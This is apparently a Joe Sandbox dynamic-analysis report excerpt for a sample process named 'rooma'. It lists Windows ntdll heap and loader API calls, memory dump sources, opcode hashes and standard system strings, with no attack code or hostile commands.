                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: d0cbdb670fab6d3301bf15a46281e6a2c82c08b571a1915cf0c0d902da7df8fb
                                                            • Instruction ID: ff6d376b1c1ac9a0b3770c00f7a91bba90dcbb1355bcc9f8b8dd4c764c362cd2
                                                            • Opcode Fuzzy Hash: d0cbdb670fab6d3301bf15a46281e6a2c82c08b571a1915cf0c0d902da7df8fb
                                                            • Instruction Fuzzy Hash: 5611993740D6555BC716E7F9A880BA9FFA5FB82B10B50029FC8C1AB562C6329885CE42

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 165 9db6b3-9db6f7 call 9b4c33 call 9dc3f3 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E283010E,00000007,00000000,00000004,00000000,009C710C,000000F4,?,?,?,?,?), ref: 009DB6F2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                                            • Instruction ID: 6d07287164de2a179a1cc44c79b840a34f9634c9ed138ec9312ca48ddbe52533
                                                            • Opcode Fuzzy Hash: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                                            • Instruction Fuzzy Hash: D8E0EDB22053457BD614EE59DC46FDB77ACEFC5710F104419F948A7242D7B0B9108AB5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 160 9db663-9db6a7 call 9b4c33 call 9dc3f3 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,009CE04B,?,?,00000000,?,009CE04B,?,?,?), ref: 009DB6A2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                                            • Instruction ID: 79f9108f4baa2216af82e1137c228e4783a22a71a0d173ae15e71289356b1751
                                                            • Opcode Fuzzy Hash: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                                            • Instruction Fuzzy Hash: 80E0EDB22056097BD614EE59DC41FDB7BACEFC9714F008419F948A7341D670B9118BB5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 175 9db703-9db73c call 9b4c33 call 9dc3f3 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,EF4AD745,?,?,EF4AD745), ref: 009DB737
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 009B0000, based on PE: true
                                                            • Associated: 00000007.00000002.1603877958.00000000009B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_9b0000_rooma.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: ed583725cdc7954a57562673015aab054e6f0475a572cb6889a77e7b51b69b1c
                                                            • Instruction ID: 46cf72eafe9fbaaf9f043fc4b81dc0e3e54589bcf533be16ff14c817cb93e59f
                                                            • Opcode Fuzzy Hash: ed583725cdc7954a57562673015aab054e6f0475a572cb6889a77e7b51b69b1c
                                                            • Instruction Fuzzy Hash: 97E086712402047BD510EA5ADC42FDB775CDFC5720F408415FA48A7242C675B901C7F4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 180 15d2c0a-15d2c0f 181 15d2c1f-15d2c26 LdrInitializeThunk 180->181 182 15d2c11-15d2c18 180->182
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                            • Instruction ID: dd5498e994d33f10a70b297bf6bc3704806a627ca2b025b84a5387940168edff
                                                            • Opcode Fuzzy Hash: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                            • Instruction Fuzzy Hash: 0EB09B71D025C5D5DA16E764460C71B794077D0711F19C461D2030A42F4778C5D1E375
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2160512332
                                                            • Opcode ID: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                            • Instruction ID: 06b2a617b03c5080b7b7583baf575935f9110f62788112b56b5754a1c5cf9f25
                                                            • Opcode Fuzzy Hash: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                            • Instruction Fuzzy Hash: 10929A71604342AFE721CE28CC90B6BB7E9BB84714F28492DFA95DB354D770E844CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                            • API String ID: 0-3591852110
                                                            • Opcode ID: cdea89b50516208cbb6c8d4e5cfc58631733ab4fcd0de16dd9a9cd1322ae3208
                                                            • Instruction ID: b75930962a3e2c3b47d660f650c2e3a2d10a7227f5c52d375042b224dd0cb1ea
                                                            • Opcode Fuzzy Hash: cdea89b50516208cbb6c8d4e5cfc58631733ab4fcd0de16dd9a9cd1322ae3208
                                                            • Instruction Fuzzy Hash: 3112BC30600646DFE726DF29C845BBABBF5FF0A714F188459E5868B652E734F881CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                            • API String ID: 0-3532704233
                                                            • Opcode ID: 1808db9c120585023681f25ce5fa7ce2fd1b9e5e74a9a0980d5aedae1e4e57b9
                                                            • Instruction ID: 8f7c3b65a9064ca517b490362c402bbb3483a9e6544bbd0b574a3918c0cd494a
                                                            • Opcode Fuzzy Hash: 1808db9c120585023681f25ce5fa7ce2fd1b9e5e74a9a0980d5aedae1e4e57b9
                                                            • Instruction Fuzzy Hash: 18B1AF719083569FD725EF68C480A6FBBF8BB84754F01492EF989EB250D770D9048BA2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                            • API String ID: 0-3063724069
                                                            • Opcode ID: 444bc73209bd9c5649645b4d3627bbdb2adf18980400415ec6fa9c0266df2813
                                                            • Instruction ID: 4ef8dd2940ffb35ed02728a99c7e5cd6e65fe27959605a2eb2b5136f7ce0b84d
                                                            • Opcode Fuzzy Hash: 444bc73209bd9c5649645b4d3627bbdb2adf18980400415ec6fa9c0266df2813
                                                            • Instruction Fuzzy Hash: 92D1C672805B32ABE731DA54CC41B6BBBE8BFD4758F044929FA44AB250D770D944CF92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            • API String ID: 0-1700792311
                                                            • Opcode ID: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                            • Instruction ID: 51857c86373650716a5f2e9ce594073e2f0d8e756a59441848fc7a6e06378613
                                                            • Opcode Fuzzy Hash: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                            • Instruction Fuzzy Hash: FED1CE316006A6EFDB26EF68C840AEDBBF6FF49610F088149F646AB752C734D941CB54
                                                            Strings
                                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0158D146
                                                            • @, xrefs: 0158D313
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0158D2C3
                                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0158D0CF
                                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0158D196
                                                            • @, xrefs: 0158D0FD
                                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0158D262
                                                            • @, xrefs: 0158D2AF
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                            • API String ID: 0-1356375266
                                                            • Opcode ID: eb37869e6309510612105383ce62253c6df5707e953005e09eb30489785f43fa
                                                            • Instruction ID: c1c42bd17acbc80380fa1420c72e059c60dc5b8b395cd12a9350929f9baad649
                                                            • Opcode Fuzzy Hash: eb37869e6309510612105383ce62253c6df5707e953005e09eb30489785f43fa
                                                            • Instruction Fuzzy Hash: D1A15E719083469FE721DF69C484B5FBBF8BF84715F00492EE689AB280D774D908CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-523794902
                                                            • Opcode ID: bea8701dd68e8240ee319b45d80cbdec96ba30af0b90aac169038dde7294ea62
                                                            • Instruction ID: 896305d76200f40a216b6634018e2dcf2d07d5f643d67b412461bc1c5e827787
                                                            • Opcode Fuzzy Hash: bea8701dd68e8240ee319b45d80cbdec96ba30af0b90aac169038dde7294ea62
                                                            • Instruction Fuzzy Hash: 8542F0316143829FD719EF28C888A6EBBE5FF88704F14496EE4969F351D734E881CB52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                            • API String ID: 0-122214566
                                                            • Opcode ID: e1997afeab7634ecee5841ce9070c8f21e54ae6397772f2525ab000ed4e8193e
                                                            • Instruction ID: 3d1b04faec817726153e37294402a39c05c888b6734b8e3f62cadee4be3b1b92
                                                            • Opcode Fuzzy Hash: e1997afeab7634ecee5841ce9070c8f21e54ae6397772f2525ab000ed4e8193e
                                                            • Instruction Fuzzy Hash: 93C16831A40216ABDB259F68CC80BBEBBB5BF85314F54416EEE029F291E774C944C3E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-792281065
                                                            • Opcode ID: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                            • Instruction ID: 8d7b75a5455382d253eeee169b85ae14ca31f506f6abc449003d19a3ccca0948
                                                            • Opcode Fuzzy Hash: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                            • Instruction Fuzzy Hash: AB910470B00316AFDB3AAF98DC85BAEBBA1BB50B14F14425CDA016F3C1DBB09901C795
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                            • API String ID: 0-1745908468
                                                            • Opcode ID: 45f1628bc05f85af2797fbc1df6b8ca9b96db57527e4cf1a23a3e304732c2f3e
                                                            • Instruction ID: 632d25fffa83ecaee72e46f928f5c9f844033ea6f271c6a545177b5ee3daccff
                                                            • Opcode Fuzzy Hash: 45f1628bc05f85af2797fbc1df6b8ca9b96db57527e4cf1a23a3e304732c2f3e
                                                            • Instruction Fuzzy Hash: 88910F31E00256DFDB16EF68C840AADBBF2FF9AB10F18809DE445AB361CB359841CB55
                                                            Strings
                                                            • LdrpInitShimEngine, xrefs: 015E99F4, 015E9A07, 015E9A30
                                                            • apphelp.dll, xrefs: 01586496
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 015E9A11, 015E9A3A
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015E99ED
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015E9A01
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015E9A2A
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-204845295
                                                            • Opcode ID: b35290789fce67f3f58b6a8bc802f8360ed364204db67cda5f668ea0c9ae8f4d
                                                            • Instruction ID: 2bfbd30a55d350deee2651dfdb88b91695c808962cc42f16e638eca6fe15ca9a
                                                            • Opcode Fuzzy Hash: b35290789fce67f3f58b6a8bc802f8360ed364204db67cda5f668ea0c9ae8f4d
                                                            • Instruction Fuzzy Hash: 42519F71608305AFE725EF24DC45AAFB7E9FF84648F40091DE585AF260D670E944CB92
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 0160031E
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016002E7
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016002BD
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                            • Instruction ID: e71c86800a6dc1d2f3a84f317c27e0af50aec4dd5123f9951130d8db1a310815
                                                            • Opcode Fuzzy Hash: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                            • Instruction Fuzzy Hash: 02E19C306047429FD72ACF2CCC84B6ABBE0BB88754F144A6EF5A58B2E1D774D945CB42
                                                            Strings
                                                            • Kernel-MUI-Language-SKU, xrefs: 015B542B
                                                            • Kernel-MUI-Number-Allowed, xrefs: 015B5247
                                                            • Kernel-MUI-Language-Disallowed, xrefs: 015B5352
                                                            • WindowsExcludedProcs, xrefs: 015B522A
                                                            • Kernel-MUI-Language-Allowed, xrefs: 015B527B
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                            • API String ID: 0-258546922
                                                            • Opcode ID: 00963e46819305c16bda5b7a28567a2f15de7d07e199da3d91326fc701c73185
                                                            • Instruction ID: 48c70b352e08fd1df83d7d5c3c07b2f729fde8e2b29b053207e880d4f5dcd581
                                                            • Opcode Fuzzy Hash: 00963e46819305c16bda5b7a28567a2f15de7d07e199da3d91326fc701c73185
                                                            • Instruction Fuzzy Hash: D9F15F72D2121AEFDB16DFA8C980ADEBBF9FF58650F54005AE501EF210E7749E018B90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            • API String ID: 0-3178619729
                                                            • Opcode ID: 492279a7a86eb0a27d9e2b099975e9a9d7bb331d12e41ee5a524319ca7e3668a
                                                            • Instruction ID: d653ece167ce09e45c789d1830ee0c42ad6f42f88ae5eaad0ea9f8826cd5075f
                                                            • Opcode Fuzzy Hash: 492279a7a86eb0a27d9e2b099975e9a9d7bb331d12e41ee5a524319ca7e3668a
                                                            • Instruction Fuzzy Hash: 9513BB70A40216DFDB29CF68C8907ADBBF1BF48304F5885A9D949AF382D735A945CF90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-3570731704
                                                            • Opcode ID: 10595ba2796bc8b1fecbedba0b33e91318c2a5fd803bd53e8055e86018e38e16
                                                            • Instruction ID: 7bf8085eb59f97f1f7c74275e1c75a05a4c414e09946437e6ee32fa604ad2f39
                                                            • Opcode Fuzzy Hash: 10595ba2796bc8b1fecbedba0b33e91318c2a5fd803bd53e8055e86018e38e16
                                                            • Instruction Fuzzy Hash: 41926C71A40629CFEB25CF18CC80BADB7B6BF45354F1581EAD949AB281E7309E80CF51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            • API String ID: 0-379654539
                                                            • Opcode ID: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                            • Instruction ID: 0abf4257855c6b09729cf8ba5588c97204a98bfbd12837d044a299474b48c4a8
                                                            • Opcode Fuzzy Hash: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                            • Instruction Fuzzy Hash: 15C169746083829FDB21CF58C144B6AB7E4BF85704F04896EFA998F251E774C949CBA3
                                                            Strings
                                                            • LdrpInitializeProcess, xrefs: 015C8422
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 015C8421
                                                            • @, xrefs: 015C8591
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015C855E
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1918872054
                                                            • Opcode ID: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                            • Instruction ID: 574bf112b7c7dfdc0caf7b82bf0e21cf7bfc036c6e7f3c8f17e0396f7fc9a3d6
                                                            • Opcode Fuzzy Hash: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                            • Instruction Fuzzy Hash: CD919E71508346AFE722DF65CC80EAFBAECBF94B44F40092EF6859A150E374D904CB62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                            • API String ID: 0-336120773
                                                            • Opcode ID: 0b9157137e94c84a63b2d7d4d3b478fc8e167ba5936c09a331c555535851247f
                                                            • Instruction ID: d05839f881fd837b368b4a85021c5db4b818bbfc9e92faf3017e8053bd77d5fb
                                                            • Opcode Fuzzy Hash: 0b9157137e94c84a63b2d7d4d3b478fc8e167ba5936c09a331c555535851247f
                                                            • Instruction Fuzzy Hash: 1731EE71210615EFE711EBA8CC85F6B77E8FF46A60F148155F541DF2A0E770A9C0CAA4
                                                            Strings
                                                            • apphelp.dll, xrefs: 015B2462
                                                            • LdrpDynamicShimModule, xrefs: 015FA998
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 015FA9A2
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015FA992
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-176724104
                                                            • Opcode ID: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                            • Instruction ID: 5737df50f2a51b5261ae8b8c303ff5f631d19a748b2858119d04fcf500f8d061
                                                            • Opcode Fuzzy Hash: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                            • Instruction Fuzzy Hash: B8314671610202BBDB31AF59DD81EAE7BB4FB80B00F16012DEA056F345C7B0A851C791
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                            • API String ID: 0-1391187441
                                                            • Opcode ID: 9df1f1c1441f9965e4c169804e89e95a67391b5ed9917f7429dfeb118142e81c
                                                            • Instruction ID: 9347729f351dc01bec2d35540850cae445ae288c5a40f4edab0bf40974a058cc
                                                            • Opcode Fuzzy Hash: 9df1f1c1441f9965e4c169804e89e95a67391b5ed9917f7429dfeb118142e81c
                                                            • Instruction Fuzzy Hash: 8531B232A00119EFDB11EB49C889FAEB7F8FF85665F144059E914BF2A1D7B0ED40CA60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $ $0
                                                            • API String ID: 0-3352262554
                                                            • Opcode ID: 69d1bb510ec254e20b651f3dd0ea91fc6f36e1f53834409383d8e0b381be5da0
                                                            • Instruction ID: d1ce6ff682f6cf77cb4684c2df9e6c4c5a84006ffd877474fb2a7a390c67a8d6
                                                            • Opcode Fuzzy Hash: 69d1bb510ec254e20b651f3dd0ea91fc6f36e1f53834409383d8e0b381be5da0
                                                            • Instruction Fuzzy Hash: B332E1B16083819FE360CF68C884B5BBBE5BBC8348F04492DE59987391D7B5E949CF52
                                                            Strings
                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01591728
                                                            • HEAP: , xrefs: 01591596
                                                            • HEAP[%wZ]: , xrefs: 01591712
                                                            Memory Dump Source
